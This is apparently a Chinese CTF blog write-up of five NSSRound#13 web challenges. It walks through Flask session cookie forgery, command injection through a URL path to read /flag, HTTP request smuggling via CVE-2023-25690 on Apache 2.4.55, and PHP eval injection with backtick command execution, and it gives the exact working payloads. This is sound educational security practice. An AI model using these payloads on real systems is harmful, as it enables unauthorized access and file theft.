[NSSRound#13 Basic] 刷题记录

文章目录

    • [NSSRound#13 Basic]flask?jwt?
    • [NSSRound#13 Basic]ez_factors
    • [NSSRound#13 Basic]flask?jwt?(hard)
    • [NSSRound#13 Basic]信息收集
    • [NSSRound#13 Basic]MyWeb


[NSSRound#13 Basic]flask?jwt?

考点:session伪造

打开题目,想注册admin发现不行(暗示很明显了)
那么我们随便注册一个登陆进去,想拿flag发现不是admin
[NSSRound#13 Basic] 刷题记录_第1张图片
猜测这里考点是session伪造
我们在忘记密码的页面找到密钥

[NSSRound#13 Basic] 刷题记录_第2张图片然后利用工具flask-session-cookie
先解密

python flask_session_cookie_manager3.py decode -s "th3f1askisfunny" -c ".eJwlzjsOwjAMANC7ZGaI48SOe5nK8UewtnRC3J1KrG96n7LnEeezbO_jikfZX162gmswavTR0k2H0JIq3o0VPZhVeoVkCLyVpyO5VA2WvAXIl3MjcJuVwkiMcZmiVkGqYp4NQyjH8hFIM6F7qC2CCRiu3Gu5I9cZx3_TyvcH8tkwDA.ZPnLwg.GAgeK3Ru7jXj9-2no9xRCYCkhvA"

得到

{'_fresh': True, '_id': '3b573ae452fdca596b909d4c7a3de77a9401f71e309d78d36d90ae79fe3016dbd7261dc806ec69c73bca3a093609cdf23e96f5bd5e368f14deacb61813eda740', '_user_id': '2'}

那么我们想伪造admin的话,猜测_user_id: 1
加密一下

python flask_session_cookie_manager3.py encode -s "th3f1askisfunny" -t "{'_fresh': True, '_id': '3b573ae452fdca596b909d4c7a3de77a9401f71e309d78d36d90ae79fe3016dbd7261dc806ec69c73bca3a093609cdf23e96f5bd5e368f14deacb61813eda740', '_user_id': '1'}"

得到加密后字符串,回到拿flag页面bp抓包
修改session得到flag

[NSSRound#13 Basic] 刷题记录_第3张图片

[NSSRound#13 Basic]ez_factors

考点:od命令

打开题目,给了一个超链接
[NSSRound#13 Basic] 刷题记录_第4张图片跳转到./factor,并且不难发现114514被分解成质因数
[NSSRound#13 Basic] 刷题记录_第5张图片提示了flag在根目录,我们尝试直接读取

/114514;cat /flag

[NSSRound#13 Basic] 刷题记录_第6张图片
发现斜杠应该是被过滤了,不然应该跟空格一样

/114514;cat %2fflag

[NSSRound#13 Basic] 刷题记录_第7张图片发现只能读出来数字,那么可以使用od命令,把它转换成八进制

/114514;od %2fflag

[NSSRound#13 Basic] 刷题记录_第8张图片

脚本

dump = "0000000 051516 041523 043124 062173 030466 062141 034544 026543 0000020 063060 033142 032055 033063 026466 033470 061545 032455 0000040 030064 034146 030461 061144 032463 076541 000012 0000055"
octs = [("0o" + n) for n in  dump.split(" ") if n]
hexs = [int(n, 8) for n in octs]
result = ""
for n in hexs:
    if (len(hex(n)) > 4):
        swapped = hex(((n << 8) | (n >> 8)) & 0xFFFF)
        result += swapped[2:].zfill(4)
print(bytes.fromhex(result).decode())

得到flag
[NSSRound#13 Basic] 刷题记录_第9张图片

[NSSRound#13 Basic]flask?jwt?(hard)

考点:session伪造

随便注册一个用户,登录点击拿flag
[NSSRound#13 Basic] 刷题记录_第10张图片发现不是admin,回到刚刚拿flag界面,发现有hint
[NSSRound#13 Basic] 刷题记录_第11张图片
访问一下,给了我们时间
[NSSRound#13 Basic] 刷题记录_第12张图片我们用Flask-Unsign进行cookie解密
发现刚好cookie有对应正确的时间
[NSSRound#13 Basic] 刷题记录_第13张图片由于还不知道key
我们尝试随便修改下刚刚的session值,发现报错信息有key

[NSSRound#13 Basic] 刷题记录_第14张图片
拿到key后伪造session(在time的值加上单引号)
[NSSRound#13 Basic] 刷题记录_第15张图片回到拿flag处,bp抓包修改session值,得到flag
[NSSRound#13 Basic] 刷题记录_第16张图片

[NSSRound#13 Basic]信息收集

考点:Apache HTTP Server 请求走私漏洞(CVE-2023-25690)

打开题目没有什么线索
[NSSRound#13 Basic] 刷题记录_第17张图片
然后查看网络,发现服务器为Apache/2.4.55 (Unix)
网上搜一下就可以知道存在Apache HTTP Server 请求走私漏洞(CVE-2023-25690)
参考文章

按照参考文章,我们要先去查看conf/httpd.conf是否添加以下模块

LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule rewrite_module modules/mod_rewrite.so

由于不知道参数,御剑扫一下得到源码
[NSSRound#13 Basic] 刷题记录_第18张图片那么我们就可以读取看上面三个模块是否开启
Apache默认安装httpd.conf在/usr/local/apache2/conf/httpd.conf

?file=/usr/local/apache2/conf/httpd.conf

[NSSRound#13 Basic] 刷题记录_第19张图片依次找到,那么我们就可以跟着文章来,进行HTTP走私
本题RewriteRule如下

RewriteEngine on RewriteRule "^/nssctf/(.*)" "http://backend-server:8080/index.php?id=$1" [P] ProxyPassReverse "/nssctf/" "http://backend-server:8080/" 

也就是说路径为./nssctf/,然后根据文章修改payload
原payload

/nssctf/abc%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0aUser-Agent:%20curl/7.68.0%0d%0a%0d%0a' + hexdata + b'GET%20/flag.txt
http://node4.anna.nssctf.cn:28916/nssctf/abc%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0AUser-Agent:%20curl/7.68.0%0D%0A%0D%0AGET%20/flag.txt

会被直接拼接到请求报文中发给后端服务器,造成了请求走私
拼接结果相当于

GET /index.php?file=abc HTTP/1.1
Host: 127.0.0.1
User-Agent: curl/7.68.0

GET /flag.txt

(这里%0d%0a是windows中的换行符)
得到flag[NSSRound#13 Basic] 刷题记录_第20张图片

[NSSRound#13 Basic]MyWeb

考点:代码审计

 

分析一下,出题人写了两个模式

  1. save模式下,首先读取/tmp/data.json这个文件,然后addslashes函数防转义(可参考sql注入中防转义),然后添加数值,最后写入进去
  2. read模式下,读取文件,然后eval函数将其解析为 PHP 代码,并将结果赋给 $data 变量。

我们可以在本地测试下
假如json数据为

[1,"Leaf",1234]

如果我们传入value为114514
那么文件内容变为

[1,"Leaf",1234,114514]

在json中注释符为//,所以我们可以注释掉后面的代码
如果要达到命令执行,可以结合换行符和分号。再考虑到防止转义,那么就用反引号绕过
payload

?mode=save&value=]//%0a;echo `cat /flag`;//

执行结果

[1,"Leaf",1234, ']//
;echo `cat/flag`;//']

结果不行
[NSSRound#13 Basic] 刷题记录_第21张图片我们将空格url编码一下

?mode=save&value=]//%0a;echo%20`cat%20/flag`;//

得到flag
[NSSRound#13 Basic] 刷题记录_第22张图片

你可能感兴趣的:(刷题记录,web安全,php,前端,python)